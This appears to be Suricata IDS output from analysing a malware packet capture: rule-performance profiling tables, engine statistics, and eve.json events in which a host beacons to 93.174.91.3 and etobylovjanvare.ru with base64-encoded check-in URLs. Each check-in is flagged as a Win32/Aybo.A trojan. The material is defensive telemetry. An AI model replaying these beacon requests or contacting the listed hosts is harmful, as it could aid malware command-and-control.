--------------------------------------------------------------------------
  Date: 11/22/2019 -- 13:17:20. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2828876      1        1        13127542     3.13   30       0        12982024    437584.73   0.00        437584.73  
  2        2807793      1        4        10028740     2.39   15       0        9271202     668582.67   0.00        668582.67  
  3        2020569      1        1        2566376      0.61   3        0        2332482     855458.67   0.00        855458.67  
  4        2826500      1        2        2247978      0.54   1        0        2247978     2247978.00  0.00        2247978.00 
  5        2801929      1        7        7977742      1.90   56       0        627294      142459.68   0.00        142459.68  
  6        2803027      1        6        14967148     3.57   99       0        584892      151183.31   0.00        151183.31  
  7        2801930      1        7        8030764      1.91   56       0        582810      143406.50   0.00        143406.50  
  8        2020963      1        2        1085794      0.26   14       0        462318      77556.71    0.00        77556.71   
  9        2021151      1        1        1621714      0.39   246      0        422792      6592.33     0.00        6592.33    
  10       2819664      1        2        10166552     2.42   51       0        413782      199344.16   0.00        199344.16  
  11       2819930      1        2        9906166      2.36   51       0        404864      194238.55   0.00        194238.55  
  12       2804911      1        3        4518224      1.08   33       0        358398      136915.88   0.00        136915.88  
  13       2804927      1        2        3472864      0.83   22       0        351810      157857.45   0.00        157857.45  
  14       2802987      1        5        16912416     4.03   174      0        350612      97197.79    0.00        97197.79   
  15       2820158      1        2        15641702     3.73   81       0        349242      193107.43   0.00        193107.43  
  16       2024909      1        2        3082222      0.73   76       0        324792      40555.55    0.00        40555.55   
  17       2820157      1        2        15646216     3.73   81       0        322766      193163.16   0.00        193163.16  
  18       2022132      1        1        6916646      1.65   1276     0        308234      5420.57     0.00        5420.57    
  19       2811447      1        2        486432       0.12   39       0        293688      12472.62    0.00        12472.62   
  20       2803657      1        5        1971580      0.47   14       0        254176      140827.14   0.00        140827.14  
  21       2804907      1        3        3688138      0.88   28       0        253374      131719.21   0.00        131719.21  
  22       2804906      1        3        3712982      0.89   29       0        251046      128033.86   0.00        128033.86  
  23       2813059      1        4        1523526      0.36   11       0        237282      138502.36   0.00        138502.36  
  24       2802991      1        5        3263454      0.78   28       0        236676      116551.93   0.00        116551.93  
  25       2016855      1        2        233586       0.06   1        0        233586      233586.00   0.00        233586.00  
  26       2020865      1        3        4890358      1.17   32       0        228652      152823.69   0.00        152823.69  
  27       2016854      1        3        179018       0.04   1        0        179018      179018.00   0.00        179018.00  
  28       2808144      1        2        172910       0.04   1        0        172910      172910.00   0.00        172910.00  
  29       2808063      1        2        1225098      0.29   14       0        171988      87507.00    0.00        87507.00   
  30       2022797      1        2        623344       0.15   5        0        167236      124668.80   0.00        124668.80  
  31       2805985      1        2        376590       0.09   3        0        166746      125530.00   0.00        125530.00  
  32       2827094      1        2        269026       0.06   2        0        158218      134513.00   0.00        134513.00  
  33       2008575      1        5        20876142     4.98   1956     0        154252      10672.87    0.00        10672.87   
  34       2018789      1        3        147474       0.04   1        0        147474      147474.00   0.00        147474.00  
  35       2808234      1        1        324186       0.08   3        0        142040      108062.00   0.00        108062.00  
  36       2018982      1        2        304218       0.07   3        0        141156      101406.00   0.00        101406.00  
  37       2807400      1        3        321016       0.08   3        0        137590      107005.33   0.00        107005.33  
  38       2022989      1        2        390488       0.09   4        0        137006      97622.00    0.00        97622.00   
  39       2022524      1        4        328408       0.08   3        0        136392      109469.33   0.00        109469.33  
  40       2017572      1        5        380584       0.09   4        0        136034      95146.00    0.00        95146.00   
  41       2819694      1        2        1232934      0.29   44       0        135934      28021.23    0.00        28021.23   
  42       2020826      1        7        128792       0.03   1        1        128792      128792.00   128792.00   0.00       
  43       2022050      1        3        296144       0.07   3        0        125524      98714.67    0.00        98714.67   
  44       2016141      1        5        120900       0.03   1        1        120900      120900.00   120900.00   0.00       
  45       2017259      1        12       927764       0.22   15       0        120640      61850.93    0.00        61850.93   
  46       2807961      1        3        429092       0.10   4        0        119406      107273.00   0.00        107273.00  
  47       2807682      1        2        569338       0.14   14       0        118162      40667.00    0.00        40667.00   
  48       2024829      1        2        2736542      0.65   66       0        116228      41462.76    0.00        41462.76   
  49       2828008      1        2        653958       0.16   16       0        115414      40872.38    0.00        40872.38   
  50       2008438      1        20       259238       0.06   3        0        113646      86412.67    0.00        86412.67   
  51       2015877      1        6        994090       0.24   15       0        110278      66272.67    0.00        66272.67   
  52       2019707      1        2        109560       0.03   1        0        109560      109560.00   0.00        109560.00  
  53       2815181      1        3        881078       0.21   14       0        109476      62934.14    0.00        62934.14   
  54       2827279      1        5        697542       0.17   16       0        105394      43596.38    0.00        43596.38   
  55       2018241      1        2        114262       0.03   3        0        104702      38087.33    0.00        38087.33   
  56       2016706      1        20       952966       0.23   15       0        101518      63531.07    0.00        63531.07   
  57       2810991      1        4        1217124      0.29   15       0        101336      81141.60    0.00        81141.60   
  58       2807970      1        8        769552       0.18   15       0        100924      51303.47    0.00        51303.47   
  59       2826727      1        2        260698       0.06   3        0        100510      86899.33    0.00        86899.33   
  60       2816895      1        2        929370       0.22   14       0        97724       66383.57    0.00        66383.57   
  61       2820931      1        2        1128578      0.27   44       0        96284       25649.50    0.00        25649.50   
  62       2815156      1        2        748642       0.18   14       0        95996       53474.43    0.00        53474.43   
  63       2024228      1        3        260458       0.06   3        0        95910       86819.33    0.00        86819.33   
  64       2022502      1        4        1070260      0.26   15       0        95642       71350.67    0.00        71350.67   
  65       2820289      1        2        1167832      0.28   14       0        95452       83416.57    0.00        83416.57   
  66       2017456      1        3        852808       0.20   14       0        95192       60914.86    0.00        60914.86   
  67       2018147      1        2        336618       0.08   4        0        93594       84154.50    0.00        84154.50   
  68       2816530      1        2        174338       0.04   2        0        93468       87169.00    0.00        87169.00   
  69       2825608      1        2        93176        0.02   1        0        93176       93176.00    0.00        93176.00   
  70       2815568      1        2        885382       0.21   15       0        92744       59025.47    0.00        59025.47   
  71       2014442      1        6        960804       0.23   14       0        92212       68628.86    0.00        68628.86   
  72       2828986      1        2        737258       0.18   14       0        91450       52661.29    0.00        52661.29   
  73       2807130      1        4        3534438      0.84   135      0        90324       26181.02    0.00        26181.02   
  74       2806027      1        3        721858       0.17   15       14       90222       48123.87    48246.43    46408.00   
  75       2016809      1        5        828488       0.20   15       0        89450       55232.53    0.00        55232.53   
  76       2021075      1        2        854102       0.20   14       14       89414       61007.29    61007.29    0.00       
  77       2809850      1        2        132174       0.03   2        0        89348       66087.00    0.00        66087.00   
  78       2021418      1        9        888452       0.21   15       0        89084       59230.13    0.00        59230.13   
  79       2013352      1        4        99510        0.02   3        0        89030       33170.00    0.00        33170.00   
  80       2014819      1        3        88410        0.02   1        0        88410       88410.00    0.00        88410.00   
  81       2018959      1        3        99212        0.02   3        1        88330       33070.67    88330.00    5441.00    
  82       2017076      1        9        862432       0.21   14       0        87312       61602.29    0.00        61602.29   
  83       2809306      1        4        3253078      0.78   117      0        87252       27804.09    0.00        27804.09   
  84       2022896      1        5        86024        0.02   1        0        86024       86024.00    0.00        86024.00   
  85       2017454      1        12       823592       0.20   14       0        85968       58828.00    0.00        58828.00   
  86       2019378      1        12       828482       0.20   14       0        83608       59177.29    0.00        59177.29   
  87       2815180      1        3        817088       0.19   14       0        83338       58363.43    0.00        58363.43   
  88       2022550      1        16       82816        0.02   1        0        82816       82816.00    0.00        82816.00   
  89       2016537      1        2        11170850     2.66   435      0        82216       25680.11    0.00        25680.11   
  90       2022901      1        2        801770       0.19   15       0        79990       53451.33    0.00        53451.33   
  91       2802880      1        3        238090       0.06   6        0        78866       39681.67    0.00        39681.67   
  92       2009897      1        14       88120        0.02   3        0        78606       29373.33    0.00        29373.33   
  93       2022830      1        2        78210        0.02   1        0        78210       78210.00    0.00        78210.00   
  94       2021413      1        2        722810       0.17   15       0        77504       48187.33    0.00        48187.33   
  95       2815220      1        2        799818       0.19   14       0        77318       57129.86    0.00        57129.86   
  96       2014405      1        10       77070        0.02   1        0        77070       77070.00    0.00        77070.00   
  97       2024771      1        1        15051486     3.59   1987     0        77066       7574.98     0.00        7574.98    
  98       2014353      1        6        86372        0.02   3        0        76960       28790.67    0.00        28790.67   
  99       2022658      1        4        76944        0.02   1        0        76944       76944.00    0.00        76944.00   
  100      2024777      1        2        7734914      1.84   1511     0        76486       5119.07     0.00        5119.07    
  101      2021607      1        6        76176        0.02   1        0        76176       76176.00    0.00        76176.00   
  102      2020991      1        2        76148        0.02   1        0        76148       76148.00    0.00        76148.00   
  103      2019714      1        10       75238        0.02   1        0        75238       75238.00    0.00        75238.00   
  104      2811905      1        3        845110       0.20   14       0        74712       60365.00    0.00        60365.00   
  105      2809363      1        3        771360       0.18   15       0        73400       51424.00    0.00        51424.00   
  106      2017036      1        3        779288       0.19   14       0        73114       55663.43    0.00        55663.43   
  107      2019395      1        2        295288       0.07   5        0        72754       59057.60    0.00        59057.60   
  108      2017948      1        2        745608       0.18   15       0        72444       49707.20    0.00        49707.20   
  109      2811700      1        2        71298        0.02   1        0        71298       71298.00    0.00        71298.00   
  110      2009028      1        11       80576        0.02   3        0        70752       26858.67    0.00        26858.67   
  111      2820117      1        2        299544       0.07   5        0        70682       59908.80    0.00        59908.80   
  112      2013441      1        9        81176        0.02   3        0        70652       27058.67    0.00        27058.67   
  113      2013511      1        3        898356       0.21   15       0        70642       59890.40    0.00        59890.40   
  114      2001330      1        8        9544570      2.28   1935     0        70560       4932.59     0.00        4932.59    
  115      2815182      1        3        785422       0.19   14       0        70170       56101.57    0.00        56101.57   
  116      2810481      1        4        3658346      0.87   102      0        69606       35866.14    0.00        35866.14   
  117      2021718      1        4        813614       0.19   14       0        69068       58115.29    0.00        58115.29   
  118      2009909      1        10       79334        0.02   3        0        68352       26444.67    0.00        26444.67   
  119      2017556      1        3        810780       0.19   14       0        68316       57912.86    0.00        57912.86   
  120      2017552      1        6        11229080     2.68   451      0        68232       24898.18    0.00        24898.18   
  121      2019094      1        5        714044       0.17   15       0        68164       47602.93    0.00        47602.93   
  122      2811826      1        7        800578       0.19   14       0        68150       57184.14    0.00        57184.14   
  123      2017119      1        4        673028       0.16   14       0        68042       48073.43    0.00        48073.43   
  124      2814883      1        3        841630       0.20   15       0        67552       56108.67    0.00        56108.67   
  125      2018403      1        10       

Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          2477          5050392     1371809036     803364872       1989.9b   99.26
 IPv4      17            12          9040214     1314545416     241550807          2.9b    0.14
 IPv6      17            14          6895118     1345869276     854692158         12.0b    0.60
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          2477           115640       29684148        584215          1.4b   93.56
TMM_FLOWWORKER              IPv4      17            12           241274       25452014       2589418         31.1m    2.01
TMM_RECEIVEPCAPFILE         IPv4       6          2473             4442       15552558         16539         40.9m    2.64
TMM_RECEIVEPCAPFILE         IPv4      17            12             4434           5346          4645         55.7k    0.00
TMM_DECODEPCAPFILE          IPv4       6          2473             4550        4659222          8625         21.3m    1.38
TMM_DECODEPCAPFILE          IPv4      17            12             4696           5634          4932         59.2k    0.00
TMM_FLOWWORKER              IPv6      17            14           221412        1348740        424437          5.9m    0.38
TMM_RECEIVEPCAPFILE         IPv6      17            14             4478          11802          5108         71.5k    0.00
TMM_DECODEPCAPFILE          IPv6      17            14             4688          55416          8534        119.5k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          2473             4748          81764          5758         14.2m  1.03  
flow                    IPv4      17            12             4770          13460          7713         92.6k  0.01  
stream                  IPv4       6          2477             4504        4495814         13751         34.1m  2.45  
app-layer               IPv4      17            12             4534          71038         21162        253.9k  0.02  
detect                  IPv4       6          2477            77530       29571856        530877          1.3b  94.74 
detect                  IPv4      17            12           213340        1005874        492258          5.9m  0.43  
tcp-prune               IPv4       6          2477             4422          56622          5177         12.8m  0.92  
flow                    IPv6      17            14             4790          43122          9340        130.8k  0.01  
app-layer               IPv6      17            14             4478          62552         12265        171.7k  0.01  
detect                  IPv6      17            14           193606        1208536        380874          5.3m  0.38  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             8             5172          71578         17021        136.2k  57.81 
http                    IPv4      17             1             5172           5172          5172          5.2k  2.20  
dns                     IPv4      17             6             5710          32290         13977         83.9k  35.60 
http                    IPv6      17             2             5172           5172          5172         10.3k  4.39  
Proto detect            IPv4      17             9             4734          23718         10550         95.0k
Proto detect            IPv6      17             5             4654          51132         15614         78.1k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            16            26824         147590         57855        925.7k  3.04  
LOGGER_UNIFIED2             IPv4       6            16            28994         123328         54835        877.4k  2.88  
LOGGER_JSON_ALERT           IPv4       6            16            48304         117084         76527          1.2m  4.02  
LOGGER_JSON_DNS             IPv4      17             6            34370       24326294       4090869         24.5m  80.50 
LOGGER_JSON_HTTP            IPv4       6            16            40104         311726         87397          1.4m  4.59  
LOGGER_JSON_FILE            IPv4       6            16            58856         150796         95088          1.5m  4.99  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          2028             4526        2814794         36028        73.1m  17.65 
payload                           IPv4      17            12             5772         292644         73222       878.7k  0.21  
stream                            IPv4       6          2028             4426       26572816         76348       154.8m  37.40 
http_uri                          IPv4       6            16            17666         268172         75938         1.2m  0.29  
http_request_line                 IPv4       6            16             6866          23510         12170       194.7k  0.05  
http_client_body                  IPv4       6            16             4806           6136          5368        85.9k  0.02  
http_header (request)             IPv4       6            16            23514         282684         81947         1.3m  0.32  
http_header (request trailer)     IPv4       6            16             4514           5408          4609        73.8k  0.02  
http_header_names (request)       IPv4       6            16            10756          78856         24973       399.6k  0.10  
http_accept (request)             IPv4       6            16             4982          22240          7437       119.0k  0.03  
http_referer (request)            IPv4       6            16             4818           6374          5199        83.2k  0.02  
http_content_len (request)        IPv4       6            16             4986          34862          7307       116.9k  0.03  
http_content_type (request)       IPv4       6            16             4924          50914         17003       272.1k  0.07  
http_protocol (request)           IPv4       6            16             5534           9288          7198       115.2k  0.03  
http_start (request)              IPv4       6            16            10196          45556         17810       285.0k  0.07  
http_raw_header (request)         IPv4       6            16            12632          41392         18627       298.0k  0.07  
http_method                       IPv4       6            16             5500          23980         10795       172.7k  0.04  
http_cookie (request)             IPv4       6            16             4782          21916          6902       110.4k  0.03  
http_raw_uri                      IPv4       6            16             7026          31128         11069       177.1k  0.04  
http_user_agent                   IPv4       6            16             5724          36272         10989       175.8k  0.04  
http_host                         IPv4       6            16             5244          34604          8694       139.1k  0.03  
dns_query                         IPv4      17             3            16630          23790         20805        62.4k  0.02  
http_response_line                IPv4       6            16             5502          29144         11416       182.7k  0.04  
http_header (response)            IPv4       6            16            18794         110072         52836       845.4k  0.20  
http_header (response trailer)    IPv4       6            16             4482           4804          4568        73.1k  0.02  
http_content_type (response)      IPv4       6            16             6384          33104         14781       236.5k  0.06  
http_raw_header (response)        IPv4       6          1987             6090          75696          6817        13.5m  3.27  
http_cookie (response)            IPv4       6            16             5028           6884          5433        86.9k  0.02  
http_stat_code                    IPv4       6            16             4982          13260          6678       106.9k  0.03  
file_data (http response)         IPv4       6          1971             4450        1667130         83099       163.8m  39.57 
Total                             IPv4                  8413                                         49097       413.1m
payload                           IPv6      17            14             5644         447910         64304       900.3k  0.22  
Total                             IPv6                    14                                         64304       900.3k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            12            59482         263054        120799          1.4m  0.08  
PROF_DETECT_IPONLY          IPv4      17             9             6232         135744         58336        525.0k  0.03  
PROF_DETECT_RULES           IPv4       6          2477             4428       17510242        197122        488.3m  26.49 
PROF_DETECT_RULES           IPv4      17            12           112750         491784        238693          2.9m  0.16  
PROF_DETECT_STATEFUL_START    IPv4       6           774             8894       10717848        146890        113.7m  6.17  
PROF_DETECT_STATEFUL_CONT    IPv4       6          2477             4402         189642         31527         78.1m  4.24  
PROF_DETECT_STATEFUL_CONT    IPv4      17            12             4492          55358         11813        141.8k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2453             4456         422704          5144         12.6m  0.68  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             6             4542           5184          4766         28.6k  0.00  
PROF_DETECT_PREFILTER       IPv4       6          2477            13428       28488156        230621        571.2m  30.99 
PROF_DETECT_PREFILTER       IPv4      17            12            41730         343856        125048          1.5m  0.08  
PROF_DETECT_PF_PAYLOAD      IPv4       6          2028            31608       26620362        127321        258.2m  14.01 
PROF_DETECT_PF_PAYLOAD      IPv4      17            12            14746         302064         82341        988.1k  0.05  
PROF_DETECT_PF_TX           IPv4       6          2453             4464       12821482         94505        231.8m  12.57 
PROF_DETECT_PF_TX           IPv4      17             3            26334          32900         30618         91.9k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1851             4456          36066          5682         10.5m  0.57  
PROF_DETECT_PF_SORT1        IPv4      17            12             4582           6458          5343         64.1k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6          2477             4406          95340          5336         13.2m  0.72  
PROF_DETECT_PF_SORT2        IPv4      17            12             4444          47806         10296        123.6k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          2477             4418          66676          5242         13.0m  0.70  
PROF_DETECT_NONMPMLIST      IPv4      17            12             4454          14334          5583         67.0k  0.00  
PROF_DETECT_ALERT           IPv4       6          2477             4408          34784          5052         12.5m  0.68  
PROF_DETECT_ALERT           IPv4      17            12             4420           5760          4701         56.4k  0.00  
PROF_DETECT_CLEANUP         IPv4       6          2477             4460          83828          5167         12.8m  0.69  
PROF_DETECT_CLEANUP         IPv4      17            12             4446           8756          5192         62.3k  0.00  
PROF_DETECT_GETSGH          IPv4       6          2477             4406         326578          5459         13.5m  0.73  
PROF_DETECT_GETSGH          IPv4      17            12             4686          11350          8611        103.3k  0.01  
PROF_DETECT_IPONLY          IPv6      17             5             5170          64746         20714        103.6k  0.01  
PROF_DETECT_RULES           IPv6      17            14            94144         267914        171077          2.4m  0.13  
PROF_DETECT_STATEFUL_CONT    IPv6      17            14             4406           5946          4833         67.7k  0.00  
PROF_DETECT_PREFILTER       IPv6      17            14            41510         561454        110055          1.5m  0.08  
PROF_DETECT_PF_PAYLOAD      IPv6      17            14            14484         457064         74673          1.0m  0.06  
PROF_DETECT_PF_SORT1        IPv6      17            14             4592          13328          6353         88.9k  0.00  
PROF_DETECT_PF_SORT2        IPv6      17            14             4454          61868          9441        132.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv6      17            14             4424           6264          4974         69.6k  0.00  
PROF_DETECT_ALERT           IPv6      17            14             4418          22894          5889         82.4k  0.00  
PROF_DETECT_CLEANUP         IPv6      17            14             4434           7822          4950         69.3k  0.00  
PROF_DETECT_GETSGH          IPv6      17            14             4432         202174         25413        355.8k  0.02  

------------------------------------------------------------------------------------
Date: 11/22/2019 -- 13:17:20 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2511
decoder.bytes                              | Total                     | 3028010
decoder.ipv4                               | Total                     | 2485
decoder.ipv6                               | Total                     | 14
decoder.ethernet                           | Total                     | 2511
decoder.tcp                                | Total                     | 2473
decoder.udp                                | Total                     | 26
decoder.avg_pkt_size                       | Total                     | 1205
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 7
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 5
tcp.syn                                    | Total                     | 7
tcp.synack                                 | Total                     | 4
tcp.rst                                    | Total                     | 5
tcp.overlap                                | Total                     | 1
detect.alert                               | Total                     | 18
detect.mpm_list                            | Total                     | 7
detect.nonmpm_list                         | Total                     | 1
detect.match_list                          | Total                     | 7
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 16
app_layer.flow.dns_udp                     | Total                     | 3
app_layer.tx.dns_udp                       | Total                     | 3
app_layer.flow.failed_udp                  | Total                     | 8
flow_mgr.new_pruned                        | Total                     | 7
flow.spare                                 | Total                     | 10000
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65536
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7078336

{"timestamp":"2017-05-03T18:40:26.424280+0000","flow_id":950287889758552,"pcap_cnt":20,"event_type":"dns","src_ip":"192.168.56.19","src_port":51871,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9830,"rrname":"dns.msftncsi.com","rrtype":"A","tx_id":0}}
{"timestamp":"2017-05-03T18:40:26.429312+0000","flow_id":950287889758552,"pcap_cnt":21,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.19","dest_port":51871,"proto":"UDP","dns":{"type":"answer","id":9830,"rcode":"NOERROR","rrname":"dns.msftncsi.com","rrtype":"A","ttl":20,"rdata":"131.107.255.255"}}
{"timestamp":"2017-05-03T18:40:26.429642+0000","flow_id":1478843745078858,"pcap_cnt":22,"event_type":"dns","src_ip":"192.168.56.19","src_port":57578,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64298,"rrname":"dns.msftncsi.com","rrtype":"AAAA","tx_id":0}}
{"timestamp":"2017-05-03T18:40:26.434455+0000","flow_id":1478843745078858,"pcap_cnt":23,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.19","dest_port":57578,"proto":"UDP","dns":{"type":"answer","id":64298,"rcode":"NOERROR","rrname":"dns.msftncsi.com","rrtype":"AAAA","ttl":185,"rdata":"fd3e:4f5a:5b81:0000:0000:0000:0000:0001"}}
{"timestamp":"2017-05-03T18:40:33.967338+0000","flow_id":1751136082182826,"pcap_cnt":24,"event_type":"dns","src_ip":"192.168.56.19","src_port":51250,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26475,"rrname":"etobylovjanvare.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2017-05-03T18:40:33.977078+0000","flow_id":1751136082182826,"pcap_cnt":25,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.19","dest_port":51250,"proto":"UDP","dns":{"type":"answer","id":26475,"rcode":"NOERROR","rrname":"etobylovjanvare.ru","rrtype":"A","ttl":2707,"rdata":"46.36.36.116"}}
{"timestamp":"2017-05-03T18:40:34.039265+0000","flow_id":1110642641671860,"pcap_cnt":33,"event_type":"http","src_ip":"192.168.56.19","src_port":55947,"dest_ip":"46.36.36.116","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"etobylovjanvare.ru","url":"\/0942c3aad278ce5ea571a61712b4506a.php","http_user_agent":"DMFR","http_content_type":"application\/octet-stream"}}
{"timestamp":"2017-05-03T18:40:34.112005+0000","flow_id":1501396618889578,"pcap_cnt":40,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:34.112005+0000","flow_id":1501396618889578,"pcap_cnt":40,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kM1prUkZNMDFVVFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:40:34.162162+0000","flow_id":1501396618889578,"pcap_cnt":41,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kM1prUkZNMDFVVFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":80},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":80,"tx_id":0}}
{"timestamp":"2017-05-03T18:40:34.587187+0000","flow_id":1501396618889578,"pcap_cnt":43,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:34.587187+0000","flow_id":1501396618889578,"pcap_cnt":43,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WTIxV2JtRllUakJhV0VvNFVWaHNhRmx0T1RCbVJGRjNVMFpDTTFwR1VsVlhWMDQ0VTFjMU1GcFhkMnhOYW1oVFNsUkpOVXN4YUd4aU1qUnNUV3BvVTBwVVNUVkxNRTVSVmxOMFJrNVRNSGxPYW1kM1N6TlpNRXQ1VlRCTlEzTjVUR3BSZDFJd2FEWkxlVEJ5VFZSQk1FNVRkRTVUU0c5eVMzbHplVTFFVVROVVZVbHlTM2x6ZDFwRGMzaGhRM042WWxOemVVMXVUWEpMZVhSWVlWYzBNMHQ1YzNKV1ZrNUNaa1JLT0UxNlNqaFdiV3g1WkVoV2FHSkZTblpsUTBKSVkyMUdkMkZIYkdwamVVSkNXa2RHZDJSSFZuaz0=","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:40:34.601895+0000","flow_id":1501396618889578,"pcap_cnt":44,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WTIxV2JtRllUakJhV0VvNFVWaHNhRmx0T1RCbVJGRjNVMFpDTTFwR1VsVlhWMDQ0VTFjMU1GcFhkMnhOYW1oVFNsUkpOVXN4YUd4aU1qUnNUV3BvVTBwVVNUVkxNRTVSVmxOMFJrNVRNSGxPYW1kM1N6TlpNRXQ1VlRCTlEzTjVUR3BSZDFJd2FEWkxlVEJ5VFZSQk1FNVRkRTVUU0c5eVMzbHplVTFFVVROVVZVbHlTM2x6ZDFwRGMzaGhRM042WWxOemVVMXVUWEpMZVhSWVlWYzBNMHQ1YzNKV1ZrNUNaa1JLT0UxNlNqaFdiV3g1WkVoV2FHSkZTblpsUTBKSVkyMUdkMkZIYkdwamVVSkNXa2RHZDJSSFZuaz0=","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":44},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":44,"tx_id":1}}
{"timestamp":"2017-05-03T18:40:34.815152+0000","flow_id":1501396618889578,"pcap_cnt":46,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:34.815152+0000","flow_id":1501396618889578,"pcap_cnt":46,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:40:54.664529+0000","flow_id":1501396618889578,"pcap_cnt":48,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":16,"tx_id":2}}
